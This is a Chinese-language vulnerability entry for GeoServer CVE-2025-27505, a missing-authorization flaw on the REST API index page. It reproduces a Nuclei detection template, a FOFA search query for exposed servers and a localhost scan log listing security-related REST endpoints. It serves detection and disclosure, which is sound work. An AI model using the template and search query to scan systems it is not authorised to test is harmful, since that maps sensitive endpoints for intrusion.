GeoServer Missing Authorization on REST API Index

漏洞信息

漏洞名称： GeoServer Missing Authorization on REST API Index

漏洞编号：

• CVE： CVE-2025-27505

漏洞类型： 未授权访问

漏洞等级： 中危

漏洞描述： ### 受影响产品
GeoServer是一个开源的服务器，允许用户共享和编辑地理空间数据。它广泛应用于各种地理信息系统（GIS）应用中，支持多种地图和数据格式，是企业级和公共部门中常见的地理数据服务解决方案。

漏洞说明

此漏洞属于未授权访问类型，具体存在于GeoServer的REST API索引页面。由于授权机制的缺失，攻击者无需认证即可访问REST API的索引页面，这可能暴露敏感信息或为进一步的攻击提供便利。技术根源在于对REST API索引页面的访问控制不足，未能正确实施授权检查。

影响分析

此漏洞可能导致信息泄露，攻击者可以利用此漏洞获取GeoServer的配置信息、系统状态等敏感数据。虽然漏洞的CVSS评分为5.3（中危），表明其影响范围有限，但在特定环境下，如配置不当或与其他漏洞结合使用时，可能会对系统安全构成更严重的威胁。值得注意的是，此漏洞无需认证即可被利用，增加了被自动化工具扫描和攻击的风险。

产品厂商： geoserver

产品名称： GeoServer

影响版本： *

搜索语法： app=”GeoServer”

来源： https://github.com/projectdiscovery/nuclei-templates/issues/12560

类型： projectdiscovery/nuclei-templates:github issues

来源概述

Is there an existing template for this?

• I have searched the existing templates.

Nuclei Template

id: CVE-2025-27505

info:
  name: GeoServer Missing Authorization on REST API Index
  author: securitytaters
  severity: medium
  description: GeoServer has authorization issue on its REST API Index page
  reference:
    - http://geoserver.org/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-862
    cpe: cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="GeoServer"
    product: geoserver
    vendor: geoserver
  tags: geoserver
  
http:
  - raw:
      - |+
        GET /geoserver/rest.html HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Geoserver Configuration API
      - type: word
        part: body
        words:
          - about/status
      - type: status
        status:
          - 200

Relevant dumped responses

[INF] Current nuclei version: v3.4.7 (latest)
[INF] Current nuclei-templates version: v10.2.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [CVE-2025-27505] Sent HTTP request to http://127.0.0.1:8080/geoserver/rest.html
[DBG] [CVE-2025-27505] Dumped HTTP response http://127.0.0.1:8080/geoserver/rest.html

HTTP/1.1 200
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
Date: Mon, 07 Jul 2025 15:11:52 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN

<html>
<head>
<title> Geoserver Configuration API </title>
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW"/>
</head>
<body>
<h2>Geoserver Configuration API</h2>
<ul>
<li><a href="http://127.0.0.1:8080/geoserver/rest/about/manifest">about/manifest</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/about/status">about/status</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/about/system-status">about/system-status</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/about/version">about/version</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/fonts">fonts</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/index">index</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/layergroups">layergroups</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/layers">layers</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/logging">logging</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/namespaces">namespaces</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/resource">resource</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/security/acl/catalog">security/acl/catalog</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/security/acl/layers">security/acl/layers</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/security/acl/rest">security/acl/rest</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/security/acl/services">security/acl/services</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/security/masterpw">security/masterpw</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/security/roles">security/roles</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/security/self/password">security/self/password</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/security/usergroup/groups">security/usergroup/groups</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/security/usergroup/users">security/usergroup/users</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/services/wcs/settings">services/wcs/settings</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/services/wfs/settings">services/wfs/settings</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/services/wms/settings">services/wms/settings</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/services/wmts/settings">services/wmts/settings</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/settings">settings</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/settings/contact">settings/contact</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/styles">styles</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/templates">templates</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/urlchecks">urlchecks</a></li>
<li><a href="http://127.0.0.1:8080/geoserver/rest/workspaces">workspaces</a></li>
</ul>
</body>
</html>
[CVE-2025-27505:word-1] [http] [medium] http://127.0.0.1:8080/geoserver/rest.html
[CVE-2025-27505:word-2] [http] [medium] http://127.0.0.1:8080/geoserver/rest.html
[CVE-2025-27505:status-3] [http] [medium] http://127.0.0.1:8080/geoserver/rest.html
[INF] Scan completed in 162.4657ms. 3 matches found.

Anything else?

Advisory on GH
https://github.com/geoserver/geoserver/security/advisories/GHSA-h86g-x8mm-78m5